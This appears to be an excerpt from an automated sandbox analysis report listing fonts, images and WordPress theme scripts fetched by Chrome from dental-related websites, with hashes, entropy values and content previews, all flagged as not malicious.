                                                                                                                                      Preview:!function(e){if(!e.hasInitialised){var t={escapeRegExp:function(e){return e.replace(/[\-\[\]\/\{\}\(\)\*\+\?\.\\\^\$\|]/g,"\\$&")},hasClass:function(e,t){var i=" ";return 1===e.nodeType&&(i+e.className+i).replace(/[\n\t]/g,i).indexOf(i+t+i)>=0},addClass:function(e,t){e.className+=" "+t},removeClass:function(e,t){var i=new RegExp("\\b"+this.escapeRegExp(t)+"\\b");e.className=e.className.replace(i,"")},interpolateString:function(e,t){var i=/{{([a-z][a-z0-9\-_]*)}}/gi;return e.replace(i,function(e){return t(arguments[1])||""})},getCookie:function(e){var t="; "+document.cookie,i=t.split("; "+e+"=");return 2!=i.length?void 0:i.pop().split(";").shift()},setCookie:function(e,t,i,n,o){var s=new Date;s.setDate(s.getDate()+(i||365));var r=[e+"="+t,"expires="+s.toUTCString(),"path="+(o||"/")];n&&r.push("domain="+n),document.cookie=r.join(";")},deepExtend:function(e,t){for(var i in t)t.hasOwnProperty(i)&&(i in e&&this.isPlainObject(e[i])&&this.isPlainObject(t[i])?this.deepExtend(e[i],t[i]):e[i]=t[
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 557 x 57, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5128
                                                                                                                                      Entropy (8bit):7.656295310067977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:fSWknmWIbv/3tJFQH+HNTUmABUNzp7v9mCtEN827B4Hkl9BrRuK:fSWkn7eNUmfb7lk8kBP9x
                                                                                                                                      MD5:2FD49EAC264B1AA4701B91390B747575
                                                                                                                                      SHA1:20AC1543470AAAE6883414A1AF9DE6975ADF00B7
                                                                                                                                      SHA-256:B7529946B4E5DBBEFB8898F89E0359CB13B3DAD34BC4330085A8CD1C66D128D4
                                                                                                                                      SHA-512:55C4D059D8D04A974F540243C1B6CF6562667C8E1516ED7F42B84864677622FF15B390B027F54E5FA3EEB1DA0D48AD6A3A0F38A4223469D90657EA3C84A3648C
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:.PNG........IHDR...-...9......1......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.0 (Macintosh)" xmp:CreateDate="2021-06-08T16:50:47+01:00" xmp:ModifyDate="2021-06-08T16:51:15+01:00" xmp:MetadataDate="2021-06-08T16:51:15+01:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:4056bbd2-a2e9-4e19-b455-88155b0325cd" xmpMM:DocumentID="adobe:docid:photoshop:f35e13c7-a04b-b449-b653-3c9565e418e0
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (5028), with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):25872
                                                                                                                                      Entropy (8bit):4.560560875892772
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:EPuK37OXxUBQeMmnm9PmBucWPS/Tjv45wmVyEjGoGSuJTVwzg8:26XxUBQpcWPkHv45tKJTV2
                                                                                                                                      MD5:01B32D1A333F5D6978385293FDFB359F
                                                                                                                                      SHA1:E6FFE05618A8D3047426F9FA27C51B47442BF70D
                                                                                                                                      SHA-256:BEB071CD3401BCD775505193A4335B99409CAE2D2AF4DB5F1A9784FE49E8C964
                                                                                                                                      SHA-512:9DDAF7266C6121438256FD957AFDA551C3B0CD2344FCFBA572105D09CAF77DBFA37E5E91634FFB006E10267F5919E869E7F5103E64AC4AB2D6F14CF9D5F03021
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/themes/themify-shoppe/themify/themify-builder/js/themify.builder.script.js?ver=5.6.4
                                                                                                                                      Preview:let ThemifyBuilderModuleJs;....(($, win,Themify, doc,und,vars)=>{.. 'use strict';.... ThemifyBuilderModuleJs = {.. loadedAddons:{},.. cssUrl:'',.. jsUrl:'',.. url:vars.builder_url,.. js_modules:vars.js_modules,.. isBpMobile:!Themify.is_builder_active && Themify.w<parseInt(vars.breakpoints.tablet[1]),.. init() {.. if(Themify.jsUrl!==''){.. this.jsUrl = this.url+'/js/modules/';.. this.cssUrl = this.url+'/css/modules/';.. }.. Themify.body.triggerHandler('themify_builder_loaded');.. if (!Themify.is_builder_active) {.. this.GridBreakPoint();.. this.InitScrollHighlight();.. const stickyItems=doc.querySelectorAll('[data-sticky-active]');.. if(stickyItems[0]!==und){.. if(win.pageYOffset>0){.. this.stickyElementInit(stickyItems);.. }..
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 31804, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):31804
                                                                                                                                      Entropy (8bit):7.9919560630616475
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:kx4/MX2kEnWOVa0AW+EL1OUzWhw34hzBik4DH8re:kK2m88pBzYre
                                                                                                                                      MD5:5485DA082E335EE0B24514DCD5975353
                                                                                                                                      SHA1:F4A6FA7763EEBC82677D78553CF1D3C67A4A54BB
                                                                                                                                      SHA-256:ABE8ED84862FAD2302094C2B232DC7784812F6CF819666E27FD049051B7E61F2
                                                                                                                                      SHA-512:F6193F37848F9ABCB15A07FF91D69BF79AA953998F6185E8045C2E21CB038A34E1E6732BA44B78E3835AF45F2E1C5C5AC3E42B3E12E7496240F53A927970BF48
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4XkRiUa6zUTjg.woff2
                                                                                                                                      Preview:wOF2......|<..........{...........................$..R..(?HVAR.0.`?STAT..'2..2/~.....t..S....0..0.6.$..f. ..N..=.....%.~... ..g..[fw.....F#.FmRAd..bR...n...L.u^5.m.SQ)(....h-.823sv.zu\Di.B...$FB.=Ca(ho....L....22$.@@.u0.........~92_ND.(....D..;.:A....C...]._....gI......T...mt.>.."0n.j.{<?.{..*..cD.Hqt..X..J0.{Fa%....H.....HB..#A.E.y.X)..B..A..v....t'.n'......\.G .QU...Cz....%.0(4.*t....}.Y..7O.Q.j.M..T\......{_J.L..Gc.-..Q...du3..._.....S{K.lN.0.....Q..}&:.R.d..d[.!7.....vT.t ...."H.$..v.r...W..Y..wZ....z.>.>.....`.....&.fyx8f..A%....k;..<..Ck.~..;q.y...T.(.........?........,..s!TK.!..a...........Z.....N.....'i......"H......./..oE.......d....9..... *v.Ezs..u...4..h..$....`C....0....q.\....p.....Y.s,..XNpB[u.......w..T.NM..l.[.....F........{........!$.d&.l.k...k.a...I8,.....:..........|g..7/.....W........r.x...\..U..P...CFR..Gi...1...M....{S.......=A.aPs.F.......mm..t.i.J)..,...%(<4.....@.@...j6Y..q...(.TU.o...2...y.TwO'{..cp.gxX..Z..U.O.C
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 21880, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):21880
                                                                                                                                      Entropy (8bit):7.988679625814612
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:t3VFUreGv0w1p0YoPgbBVkq6XMCl/i3zrGXSYflcN46WCoZiUyWdtqHAO/a0cMWY:t+nvt2v4bBVkq6XMk0zYde4CoZFyWvqr
                                                                                                                                      MD5:8F0947C22CFE92D779516C885D87BCCB
                                                                                                                                      SHA1:78EC19BFC24E54EF967CFF6870D35143CA6771F4
                                                                                                                                      SHA-256:FF616AEAA81BF39FB972031883B026510BBB16C0FCD2EFBB48225618C439FECD
                                                                                                                                      SHA-512:B1E6D9E54D90AA0EA8163D609AED525E4CE09FBFC995B453D41EC34900F3A131231B661F78BBC78DDE7DA007B33CA9E8956CCE46DFE6ACEB76189D7F00BCAE91
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4XkRiUa6zsTjmbI.woff2
                                                                                                                                      Preview:wOF2......Ux..........U...........................K..t...?HVAR.v.`?STAT..'2..t/~.....@.'..F.0.>.6.$.... ..N..g...q.'.sp.Z.N.&......x......f....2...?5..#..C@.j...tR.E)^<2.Q[...>=.g.x%..L...@.W.@.^.H..Q.......i>.I....LY'L...e.....s..-M...r.K}i.^.g.o....=1..>.#...6.Oa.....H..b...t.....%...K.J..J.G...!}+...w.6......g.E....Zfl..x.,..".q.#Y9/..y.._..;w..).2.a.j..."`..Z..g..t0>.v.vH..!v$......t.t.V...........H.Y..6B.e..16.;}.....}.G...\k.....M.AM8.......K.s..3..-......,.Y.gy..V.x..>...dz..=.P%MS8........p...S..f.Yb/v.-.k...(...r.B.......@~.....+...&.x....e....0@.L.]....!$..W............>H.*.E7.F.3.......Nr..83M@S..p|p.7......D../.L......]....<.`.....t....iS.....$).Q.8p.B .....I....i*,k..LL3.o..i'.5..2.I..v.H.@..2......&.X.....L.....tw.....-m.6.M.*...+.l5.....4.NQ.EQ.........s|...x...6...Y..s.."....5p.x{....0.?...5."}GO&.r....;@{l...I.w....@.....br.B.sk..6..?.tlX.j......O.....t.[.%..t.gtg".|&X....#.Vg.q..g$.J..q.h*..e.O..i..m.2......s....!..../......)..@..........
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):119599
                                                                                                                                      Entropy (8bit):7.867371358434238
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:f5jT7kQ2gP12WyxEyukmu7v6yhU9Nc0ABW4BPdL1mh:+PgP1cxfukmxyhU9Nc0AB9PdL1mh
                                                                                                                                      MD5:77A09CC843F95BF6211950827B4CCC10
                                                                                                                                      SHA1:CBD1C1E1822D03628A074CE59E604B61315CD488
                                                                                                                                      SHA-256:7CF6574A4F676DF80C7BAACCEC19DA5C9FF75C6C3ECA5DB91C8BF6604AF5B6DA
                                                                                                                                      SHA-512:CC02437A6B9661B8064E66783EE07ED2C0617A0C9794E145CD1777F2C0345A22FEFDDA2C685E1060803CEE044FD24D6BD26031C41BB223E2DB822585CE61A8FA
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:7EDAFDFE04F111E791F98894D3D78840" xmpMM:InstanceID="xmp.iid:7EDAFDFD04F111E791F98894D3D78840" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f3e7a987-8ab4-4f07-8b62-5725d2b92aeb" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):5
                                                                                                                                      Entropy (8bit):1.5219280948873621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U8n:U8n
                                                                                                                                      MD5:83D24D4B43CC7EEF2B61E66C95F3D158
                                                                                                                                      SHA1:F0CAFC285EE23BB6C28C5166F305493C4331C84D
                                                                                                                                      SHA-256:1C0FF118A4290C99F39C90ABB38703A866E47251B23CCA20266C69C812CCAFEB
                                                                                                                                      SHA-512:E6E84563D3A55767F8E5F36C4E217A0768120D6E15CE4D01AA63D36AF7EC8D20B600CE96DCC56DE91EC7E55E83A8267BADDD68B61447069B82ABDB2E92C6ACB6
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://p.typekit.net/p.css?s=1&k=aqv2rmz&ht=tk&f=28423.28431.28434.28435.28437.28439.28442.28443.28444.28445.28447.28448.28449.28450.28452.28455.28456.28457.28458.28461.28462.28463.28464.28465.28467.28468.28469.28470.28474.28475.28477&a=36985702&app=typekit&e=css
                                                                                                                                      Preview:/**/.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1598
                                                                                                                                      Entropy (8bit):7.68959991126341
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:JPWjAaJax6c6DPr8wygmI+dSmctO1j608b8KDMbpk:1GAL6/rIhgdi3OOk0QCk
                                                                                                                                      MD5:B1614503D1AA540FC04471AE6D062D7C
                                                                                                                                      SHA1:88A2D69F579A1FC454AEEECEC35E73BB539643BF
                                                                                                                                      SHA-256:41DB6F9500F3EE616AB9FCA4C5B13B24A75184B0618C8CD0748CBFF5B6EA060F
                                                                                                                                      SHA-512:F853FF384A9B5047F8D8A0E1BAE14DDF8B0B703B1EF4950F1F33495AF0214F9D78FDFC282646E504AB0712940F99F3449C188CE3868F7F1368271C99FD0A92E6
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:.PNG........IHDR...............A>....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..u.0.Fm&...LP. ..M7..4L.t........N.;.t.........[.eY2....m0....#.G........................................%.....q.>L.].m,...K....0._..%J."..DZ...~..}.#C.".M.2m.....=..j.V.M..e'.v.L...T....CM.X.?cym.$r.S../...m.vI.p.p..>.1.C.......)wg..';..1By.Jrt..eq....=.E...j.*Y.K..6..[G..#mO}dXa.B.&bq.'y....m.'D(...p..r+n'bN.......y.F0bM2.L..^.K..l.....U.D.J$....A..O.....e.a).,.....H..'q7.L.A,..[Y.......S...%.i..S.SL0.....\....y.S.#Y....$.ME.!....I.r..cT..i..E...j.vv.+.5i.*&?..<...7r.N..~.....{...W./T.h........9.VV2G.d....N.QvT...5..7.*..Hr.)A.. UD..|....+._........t;3_q.{D".l.o..s/J j!..X.S..M....#....Ws...J.o..>....E(w-...H..Jd....+.........t..`..F...R,..w...zk..b....t...9.U&..hJ>{.....1.X...3....F.-.R.R4.L.....T.+.N.....Kl.+.C..MH,...1...I.bT0...5.&...i.......XVi..6:....A k_,S..:.....T.s.`.5kn..Y."J....|>.k...N...._{s......e....^.vE.u.D/.6..|.`.....6.d..........C.M..&.}.P
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 597 x 164, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6532
                                                                                                                                      Entropy (8bit):7.799816343177
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:eJVIOdY/SgoXVvgNSOKZQRm9kVBnxHjKZe3Rjj:qDnBVvTBZ39k7xD5Bj
                                                                                                                                      MD5:6E29C80E51C4B23D7715D40FD1E1227E
                                                                                                                                      SHA1:2C8FF2B3B369184B99773FC8A24BBD09E6EB7E41
                                                                                                                                      SHA-256:1A560BF133A11F43115F9DE3BCBFF76B3CC4851E7AE5DF18EEEC53FD11E5512E
                                                                                                                                      SHA-512:AC7F26302F6073B1B1BE2D614A5D8826BA39A5B3B7DF2F8D8F65A0E473491A720A5C52EEB3CDB27CE1C96DF88ACBC4A6F9A4426547F894A8B00833F3F6365B17
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:.PNG........IHDR...U..........W.'....tEXtSoftware.Adobe ImageReadyq.e<...&IDATx...u.H..O.....T......T...... v..+.\Ap.Q*.....V..7....`..`@..9.G.......s.N......3.|.d...?.....'49... .~.R...Y.}....l.q...........RTeb*V!..p.4..m.........&/..3u.={.|#....V.\.........."..52..r$.sb....`r.J..g..r...!A.....G..J..........?s....`..j.U"........dH....F)..K.%...U\.ci\..I<Z....on.......U...=.2...&Dq...x.NT@.-v.h|...,....#.~F...sE...."D.....aR..g...nL^9...D.K.....QuIR.]ly,...3.{N....rw....WT...s....*. .`.#z...1I..K...=.*y.Y*...D`[...,....0>Q...s.......b&.]'..&.s;....T..V+L...`..J..7..+/...."k^.<^.n............Qe.m&....0*.......3.......K.}{c.F(..h.a.&$w.).......ej|.G...GE..Mf=~.XP...{...@..*.x..x.4{...Z...1.......;.U.g..>.N.............&.B...Y.EL.Z,Z.*..$z......,./.......sL... lQ.K.=.,.$.}.K<F...$..(..^.s.U(..c...S.....]%...xk&*...N.:k...L..W._a....a.*..WY.....:S..;.*U!..{.g.HD...@X..# \D...)..,UL..#.R.......a..!y.....U/...U.....'..[..cK.{Z.........J.......g.m</.....
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2702
                                                                                                                                      Entropy (8bit):7.879513611280411
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rQDRozoit9ESWlxvAZ3dYSrpi1Koosu0rzIKeGqG7H6+D1wnt:8DmlWbvABdYSrI11HneGqf+D1wnt
                                                                                                                                      MD5:66DFF8EB18FE75983D0560D9B2829B6C
                                                                                                                                      SHA1:D46111B4F027C1AF8BDECD2BFD6C564119920523
                                                                                                                                      SHA-256:2B981B9E3AC25C9BD76654DA7C084B5C31D9B0D814BD4606138A0E8B56DB4453
                                                                                                                                      SHA-512:57BB7D3A6A01ED7B49B46FEC690D9873E2635B18FC2DCC783839A26CE85D76D95985A646628A3DD6D116556EF969A6EF61AE3255BC3D73C0B2014CE322C87A34
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:.PNG........IHDR...............A>....tEXtSoftware.Adobe ImageReadyq.e<...0IDATx..].q.8..4..L.7f*0S....... J..U...9...R..*.=W.t..@.8.S.......p..2.`..~.$g..p.\........S.{v......f....A2v,.Q_...U{-.q.D).....8)Y..IRvT.8]..H.>Y..5..(I3.AU.........?. ...0.....u.k....A..Q........Cd1..|.F.9..{@..~$D..X%f...fv%.$..RpW......)......bR.4..EZ!.L....I..T.Q.....I.(.0..D.?.0..LW.D...`:.E@.....M.0....,SP...)...S...a.Q...v{.3...B.....Y......{.o..Fh.d.~2.4W..#.Z[.=%.y.a..p.l.!6.i.....Wv,.0q.!....W....#....^...g.....?.Q.K....u.v.."...f.|.....1..'N..?.U.....0..b...-._..u...j...@.!.a......Yarj;..@..^..s_.%Q.$L...e.T..D.K.-.."&.f..0...!&LF......0."....8..y.S.>.a.c..*.....c...h...9...0...a.I.^.oD..n.@H...;.F.. .D...I[...|.S.#.......|.i..^.uB........m..g..R.n..1....h.3.nI.2....a..$.....c...]..2.6/..B...}..1.6../..h.x....%.r@...1.Y...H.n.*S....%|.9.0{y.N..8T...m5.K.*#......Y..N.J..|....Td.0H....|`..b...L.....j..z......+...=.VF..,.+k..S....QV..4.E...Z..Z5Y$|.b
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):74590
                                                                                                                                      Entropy (8bit):7.793829977099399
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:jXg3JbDSsgVJwUdmkehfLaOOO7x1H5zE0YEqVasbfYXI4RJoXN:j8DSsg7dmdhfLdTdE0NqmY4sN
                                                                                                                                      MD5:E7AC302653AADD6C1BE4732A3F1B0830
                                                                                                                                      SHA1:836F8560CA5194685EB73A1F15F8C33D32F8F074
                                                                                                                                      SHA-256:92EECEDA3C2D8063E2B753FA718DAA8D9B595F7AA1ADD69E646891C7E1AE2F98
                                                                                                                                      SHA-512:779713841C82D895A74BB44E05A62478E2CFF86307F2E05DD46FED8EA0780D672624EBF36961731AE942E44658591319FADD7F0F0DC640D26F7CFFC185991686
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:59FDD67A08B511E79DCAE5F779D0D3BC" xmpMM:InstanceID="xmp.iid:59FDD67908B511E79DCAE5F779D0D3BC" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:68613617-165a-47a6-8ae0-734b35705161" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):124843
                                                                                                                                      Entropy (8bit):7.805065786623428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:deFh09vaz/2cKW0/5+ScIJ8yubTyOD1nO:QYVazeutqJzub/DlO
                                                                                                                                      MD5:5F44062FD37A5EB20EDD5571277E4AD1
                                                                                                                                      SHA1:0695AD8F3C826FB318940768446E336A6DFBF430
                                                                                                                                      SHA-256:34C8DE29F70D00D634044F53F2998186E3F62C6AD778D53B6CF4B8DD3476C8E0
                                                                                                                                      SHA-512:67AE2CA1BF0205FD262FDF98B5F96C61096E46B1FDCD53961623C58D05D7BD7C6B65D2CF6A2173F7315F308FA3255A86479CA37565CD51470AA28C480755AE6B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:8EDFE61F054411E791F98894D3D78840" xmpMM:InstanceID="xmp.iid:8EDFE61E054411E791F98894D3D78840" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f3e7a987-8ab4-4f07-8b62-5725d2b92aeb" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 225 x 226, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):6588
                                                                                                                                      Entropy (8bit):7.90682636690657
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:nSmzoMFNZ4Exkqj2V01P9RFeKjbVCtJJHXhgnndHNQtKCPPfzofmYIGJScfTg8Qu:SA9x1HKKj4H+nnzlyDdVcfTgjvFwN
                                                                                                                                      MD5:607EA8ADF895376E8AEFE11D23AA76F1
                                                                                                                                      SHA1:A3D5432534D2EA806A39C91124EE16C7E0E2B858
                                                                                                                                      SHA-256:2B6C5165029BE100337B9BD0248B8068FF5593B2B063B520C1E65EB83A9C10B6
                                                                                                                                      SHA-512:539A43F0E43299F0EFF807D95B606D1540E41048EE34699C48DCD6590D510B72E36368FD39CC85F823A87FA4B0E4BE59F06DDE53DE9127CE09158272294EBC28
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/images/shield.png
                                                                                                                                      Preview:.PNG........IHDR..............'......tEXtSoftware.Adobe ImageReadyq.e<...^IDATx..}pU..Kx./M./.."...h|.X.@....fw.@...t.-K..t...cw.U...3*8[.uw5T...% T...P..0.. ..%..K..r.....>/.<.9......}99.|./.K.A.ja.<..A.Xb.%..(K^H.....:^...'7.J.......)a..t..... L.r...q..!$.@.a.uT....B....*\=@.).0.....B....B...!.......0O..@....\Y@...`..%..o....c>@..Pn..k=<....BHj.....u......J..B.).B.9a..b..8 ...Wb....=..BG.,.W...B.....v..D.I..+6.7...~rJ.B...0..Q.s5..~..BG56.......~?.u?E.:.H..5.m.. .H....P..y%C.\.....r;......A.fb.B...M.....z...+.6..P.Q....H......,@...T.:e..{.......{..x...h.".E@.....xW.Z7.f...)'.F.,.H..&+.@loS.Q....P'.(.{Pe....[.}...@H"'$...{..;J.....Lb9.@.[.I..C&..o.G.G...t..m~.:....P..u4......<.t...=.....,...O.0..Zy.xI.j.c.......2..r._...-{$..A.Cx.V..;..H@.....lqG{_o...@.G........ t.}s*<....@....\F@.5.c.S.T/....Cy`...!.........E..Z..F..2....J....B..B.\1..{..0.>"... ...<+..j...:...r....o=......hC..ME.../...L6..lc.s..P.iR.+o9rI.vc.s.3..S.a.?f.|....!+4.Y....
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 19280, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):19280
                                                                                                                                      Entropy (8bit):7.989390751408743
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:+nPVE+q20DN1AUNKISRo23yr665dR0bwqwbmPCb7NqrgXl:YVE+V0B1FkISyKyfdNbjbCkl
                                                                                                                                      MD5:386FB59BE54B2D819064AF98E57CC226
                                                                                                                                      SHA1:9E2D14D736BE97EC84BFCA3513558450CD6E3249
                                                                                                                                      SHA-256:B4855CC8EC721CBAF27F3C907345E101B1524858221C14FAA79DF34CB2F84991
                                                                                                                                      SHA-512:48AFF0E121C618458049B3182246C8F49DEF7BB27B91E77A59E4FEE689CDEF7431637A83A333E3C3F596A5A588123B64A88FE4438E2C01E5C48B3124C9603674
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWVAewA.woff2
